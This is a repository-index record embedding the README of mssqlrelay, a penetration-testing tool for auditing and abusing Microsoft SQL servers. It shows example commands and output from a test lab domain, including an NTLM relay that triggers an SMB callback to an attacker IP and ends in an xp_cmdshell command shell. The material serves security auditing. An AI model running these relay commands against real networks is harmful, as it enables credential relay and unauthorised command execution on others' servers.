{"id":23196673,"url":"https://github.com/compasssecurity/mssqlrelay","last_synced_at":"2025-08-18T22:31:58.861Z","repository":{"id":198489616,"uuid":"634845154","full_name":"CompassSecurity/mssqlrelay","owner":"CompassSecurity","description":"Tool for MSSQL relay audit and abuse","archived":false,"fork":false,"pushed_at":"2024-03-06T15:02:49.000Z","size":80,"stargazers_count":22,"open_issues_count":0,"forks_count":6,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-03-07T16:04:17.409Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CompassSecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2023-05-01T11:00:24.000Z","updated_at":"2024-03-07T16:04:17.410Z","dependencies_parsed_at":null,"dependency_job_id":"4c373e3b-9093-437c-992e-2adc91faa688","html_url":"https://github.com/CompassSecurity/mssqlrelay","commit_stats":null,"previous_names":["compasssecurity/mssqlrelay"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fmssqlrelay","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fmssqlrelay/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fmssqlrelay/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fmssqlrelay/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CompassSecurity","download_url":"https://codeload.github.com/CompassSecurity/mssqlrelay/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":230284198,"owners_count":18202347,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-18T14:20:00.882Z","updated_at":"2024-12-18T14:20:01.569Z","avatar_url":"https://github.com/CompassSecurity.png","language":"Python","readme":"# MSSQLRelay\n\nMicrosoft SQL Relay is an offensive tool for auditing and abusing Microsoft SQL (MSSQL) services.\n\n## Installation\n\nInstall the dev branch of impacket, then install the mssqlrelay package:\n```bash\npip3 install git+https://github.com/fortra/impacket.git\npip3 install git+https://github.com/CompassSecurity/mssqlrelay.git\n```\n\n## Usage\n\n```bash\n$ mssqlrelay \nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\nusage: mssqlrelay [-v] [-h] [-debug] {check,checkall,relay} ...\n\nMicrosoft SQL Relaying Tool\n\npositional arguments:\n {check,checkall,relay}\n Action\n check Check if server enforces encryption\n checkall Lists MSSQL servers (from LDAP), check if user has access and encryption settings\n relay NTLM Relay to MS SQL Endpoints\n\noptions:\n -v, --version Show MSSQLRelay's version number and exit\n -h, --help Show this help message and exit\n -debug Turn debug output on\n```\n\n### Check\n\nRun checks against a single server (target).\nReturns information about the server and if encryption is enforced or not.\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cb\u003eOptions\u003c/b\u003e\u003c/summary\u003e\n\n```bash\n$ mssqlrelay check -h \nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\nusage: mssqlrelay check [-h] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port] [-mssql-db db name]\n\noptions:\n -h, --help show this help message and exit\n\nconnection options:\n -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\n -target dns/ip address\n DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication\n -ns nameserver Nameserver for DNS resolution\n -dns-tcp Use TCP instead of UDP for DNS queries\n -timeout seconds Timeout for connections\n\nauthentication options:\n -u username@domain, -username username@domain\n Username. Format: username@domain\n -p password, -password password\n Password\n -hashes [LMHASH:]NTHASH\n NTLM hash, format is [LMHASH:]NTHASH\n -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line\n -windows-auth whether or not to use Windows Authentication (default True)\n -sspi Use Windows Integrated Authentication (SSPI)\n -aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)\n -no-pass Don't ask for password (useful for -k and -sspi)\n\nMSSQL options:\n -mssql-port port MSSQL port to log in to\n -mssql-db db name MSSQL database instance (default None)\n```\n\u003c/details\u003e\n\n#### Typical usage\n```bash\n$ mssqlrelay check -target ws1.child.testlab.local -ns 10.0.1.100 -u tmassie@child.testlab.local -p 'Burp!=B33F' -windows-auth\nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\n[+] Trying to resolve 'ws1.child.testlab.local' at '10.0.1.100'\n[+] Trying to resolve 'CHILD.TESTLAB.LOCAL' at '10.0.1.100'\n[*] ws1.child.testlab.local (10.0.1.103:1433)\n[*] - Version: Microsoft SQL Server 2019 RTM (15.0.2000)\n[*] - Encryption: not enforced\n[*] - Login: successful (as TMASSIE)\n[*] - DB user: guest\n[*] - Database: master\n```\n\n### CheckAll\n\nRun checks against all MSSQL SPNs in the domain. Target is a domain controller.\nReturns information about all servers and their configuration.\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cb\u003eOptions\u003c/b\u003e\u003c/summary\u003e\n\n```bash\n$ mssqlrelay checkall -h\nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\nusage: mssqlrelay checkall [-h] [-scheme ldap scheme] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port]\n [-mssql-db db name]\n\noptions:\n -h, --help show this help message and exit\n\nconnection options:\n -scheme ldap scheme\n -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\n -target dns/ip address\n DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication\n -ns nameserver Nameserver for DNS resolution\n -dns-tcp Use TCP instead of UDP for DNS queries\n -timeout seconds Timeout for connections\n\nauthentication options:\n -u username@domain, -username username@domain\n Username. Format: username@domain\n -p password, -password password\n Password\n -hashes [LMHASH:]NTHASH\n NTLM hash, format is [LMHASH:]NTHASH\n -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line\n -windows-auth whether or not to use Windows Authentication (default True)\n -sspi Use Windows Integrated Authentication (SSPI)\n -aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)\n -no-pass Don't ask for password (useful for -k and -sspi)\n\nMSSQL options:\n -mssql-port port MSSQL port to log in to\n -mssql-db db name MSSQL database instance (default None)\n```\n\u003c/details\u003e\n\n#### Typical usage\n```bash\n$ mssqlrelay checkall -scheme ldap -target child.testlab.local -ns 10.0.1.100 -u tmassie@child.testlab.local -p 'Burp!=B33F' -windows-auth\nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\n[*] SPNs in domain CHILD.TESTLAB.LOCAL:\n[*] - MSSQLSvc/fs1.child.testlab.local:1433 (running as svc_sql)\n[*] - MSSQLSvc/ws1.child.testlab.local:1433 (running as svc_sql)\n[*] Checking found instances ...\n[*] fs1.child.testlab.local (10.0.1.101:1433)\n[*] - Version: Microsoft SQL Server 2019 RTM (15.0.2000)\n[*] - Encryption: enforced\n[*] - Login: successful (as TMASSIE)\n[*] - DB user: guest\n[*] - Database: master\n[*] - Privileges: ['xp_dirtree', 'xp_fileexist']\n[*] ws1.child.testlab.local (10.0.1.103:1433)\n[*] - Version: Microsoft SQL Server 2019 RTM (15.0.2000)\n[*] - Encryption: not enforced\n[*] - Login: successful (as TMASSIE)\n[*] - DB user: guest\n[*] - Database: master\n```\n\n### Relay\n\nConnects to victim server (`-target`) as user (`-u`) to trigger SMB connection as service account to attacker (`attacker`) and relay to target server (`relaytarget`).\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cb\u003eOptions\u003c/b\u003e\u003c/summary\u003e\n\n```bash\n$ mssqlrelay checkall -h\nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\nusage: mssqlrelay checkall [-h] [-scheme ldap scheme] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port]\n [-mssql-db db name]\n\noptions:\n -h, --help show this help message and exit\n\nconnection options:\n -scheme ldap scheme\n -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\n -target dns/ip address\n DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication\n -ns nameserver Nameserver for DNS resolution\n -dns-tcp Use TCP instead of UDP for DNS queries\n -timeout seconds Timeout for connections\n\nauthentication options:\n -u username@domain, -username username@domain\n Username. Format: username@domain\n -p password, -password password\n Password\n -hashes [LMHASH:]NTHASH\n NTLM hash, format is [LMHASH:]NTHASH\n -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line\n -windows-auth whether or not to use Windows Authentication (default True)\n -sspi Use Windows Integrated Authentication (SSPI)\n -aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)\n -no-pass Don't ask for password (useful for -k and -sspi)\n\nMSSQL options:\n -mssql-port port MSSQL port to log in to\n -mssql-db db name MSSQL database instance (default None)\n```\n\u003c/details\u003e\n\n#### Typical usage\n```bash\n$ mssqlrelay relay -target fs1.child.testlab.local -u tmassie@child.testlab.local -p 'Burp!=B33F' ws1.child.testlab.local 10.0.1.15 \nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\n[*] Listening on 0.0.0.0:445\n[*] Authenticating to victim 10.0.1.101\n[*] Triggering connection to \\\\10.0.1.15\\vKCIsdeX\n[!] Press help for extra shell commands\nSQL (child\\svc_sql dbo@master)\u003e xp_cmdshell whoami\noutput \n------------- \nchild\\svc_sql \n\nNULL \n```\n\n## Contact\n\nPlease submit any bugs, issues, questions, or feature requests under \"Issues\" or send them to me on Twitter [@sploutchy](https://twitter.com/sploutchy).\n\n## Credits\n\n- [Alberto Solino](https://twitter.com/agsolino) and the whole team at impacket\n- [Oliver Lyak](https://twitter.com/ly4k_) as I stole the project structure from [certipy](https://github.com/ly4k/Certipy)\n- [Dirk-jan Mollema])(https://twitter.com/_dirkjan) for his great contributions to impacket","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcompasssecurity%2Fmssqlrelay","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcompasssecurity%2Fmssqlrelay","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcompasssecurity%2Fmssqlrelay/lists"}